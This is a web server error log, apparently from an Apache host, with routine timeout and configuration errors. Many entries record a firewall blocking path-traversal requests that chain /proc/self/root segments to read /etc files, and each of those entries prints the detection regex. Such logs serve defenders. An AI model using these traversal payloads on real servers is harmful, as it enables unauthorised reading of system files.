[Thu Mar 19 10:10:50.129859 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44496] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:11:12.136003 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44978] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:11:36.115055 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45494] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:11:38.063953 2026] [core:alert] [pid 17653:tid 140411557287680] [client 57.141.18.50:47170] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 10:12:04.081796 2026] [proxy_fcgi:error] [pid 19093:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46048] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:12:12.175645 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:42352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv2LAkwaGbbGflqUZC6aQAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:12:14.719154 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:40814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv2Lsdf6f5d65gmYZRxQgAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:12:15.858018 2026] [core:alert] [pid 30077:tid 140411565680384] [client 57.141.18.30:47906] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 10:12:35.045827 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46704] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:12:38.252997 2026] [mime_magic:error] [pid 30077:tid 140411666392832] (70014)End of file found: [client 57.141.18.76:48486] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:13:04.141783 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:47300] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:13:15.964471 2026] [core:alert] [pid 27293:tid 140411691570944] [client 57.141.18.51:48808] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 10:13:34.073930 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:47920] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:13:41.470506 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.243.128:40822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv2hQbLMZ6AikZjR9VZBgAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:13:47.226147 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.228.61:45534] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv2i8df6f5d65gmYZRxYgAAAs0"]
[Thu Mar 19 10:14:03.037973 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:48578] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:14:29.129786 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49148] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:14:53.801825 2026] [proxy_fcgi:error] [pid 27403:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49640] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:15:05.638498 2026] [access_compat:error] [pid 30077:tid 140411616036608] [client 216.73.216.191:14410] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Thu Mar 19 10:15:21.125802 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:50256] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:15:24.533169 2026] [mime_magic:error] [pid 19093:tid 140411624429312] (70014)End of file found: [client 57.141.18.89:51826] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:15:38.927658 2026] [mime_magic:error] [pid 15826:tid 140411624429312] (70014)End of file found: [client 74.7.243.128:42870] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc
[Thu Mar 19 10:15:39.726342 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.244.43:57092] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv2--yqAr6etmhZHNpcmwAAAEw"]
[Thu Mar 19 10:15:43.133832 2026] [proxy_fcgi:error] [pid 14269:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50816] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:16:04.137847 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51316] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:16:15.232889 2026] [mime_magic:error] [pid 26799:tid 140411632822016] (70014)End of file found: [client 57.141.18.5:53294] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:16:27.121790 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51782] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:16:31.000352 2026] [mime_magic:error] [pid 26799:tid 140411666392832] (70014)End of file found: [client 57.141.18.32:53552] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:16:50.125797 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:52280] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:16:55.944891 2026] [core:alert] [pid 15826:tid 140411741927168] [client 74.7.243.128:59824] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run
[Thu Mar 19 10:17:12.061951 2026] [proxy_fcgi:error] [pid 19093:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52734] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:17:34.149825 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53312] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:17:48.130676 2026] [core:alert] [pid 31803:tid 140411590858496] [client 74.7.241.31:37326] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/systemd
[Thu Mar 19 10:17:48.998389 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.243.128:57886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3fF_V7PWP6ixUYl63-gAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:17:52.391256 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.243.128:33500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3gBkFeYa1D6dYQnDr_QAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:17:56.171949 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:33514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3hMdf6f5d65gmYZRyAQAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:17:57.127430 2026] [proxy_fcgi:error] [pid 15826:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53766] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:17:59.950716 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:50334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3h_-YZRR_7pZ7nDKHvQAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:18:03.048943 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:50350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3i_u8EFLIOrSqIpugvAAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:05.527479 2026] [:error] [pid 19093:tid 140411574073088] [client 74.7.243.128:50362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3jV_V7PWP6ixUYl64AQAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:18:06.915659 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.243.128:50378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3jgbLMZ6AikZjR9VZeQAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:08.547259 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:50394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3kMdf6f5d65gmYZRyEAAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:18:10.811749 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:45690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3kuyqAr6etmhZHNpdBwAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:14.547097 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:45702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3lgkwaGbbGflqUZC7VAAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:18.607609 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:45706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3muoXxyEfFpUF8f8KgQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:23.753353 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:34940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3n_-YZRR_7pZ7nDKHyQAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:25.081824 2026] [proxy_fcgi:error] [pid 27403:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54416] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:18:28.049678 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:34950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3pOoXxyEfFpUF8f8KhAAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 10:18:28.247147 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:34950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv3pOoXxyEfFpUF8f8KhgAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
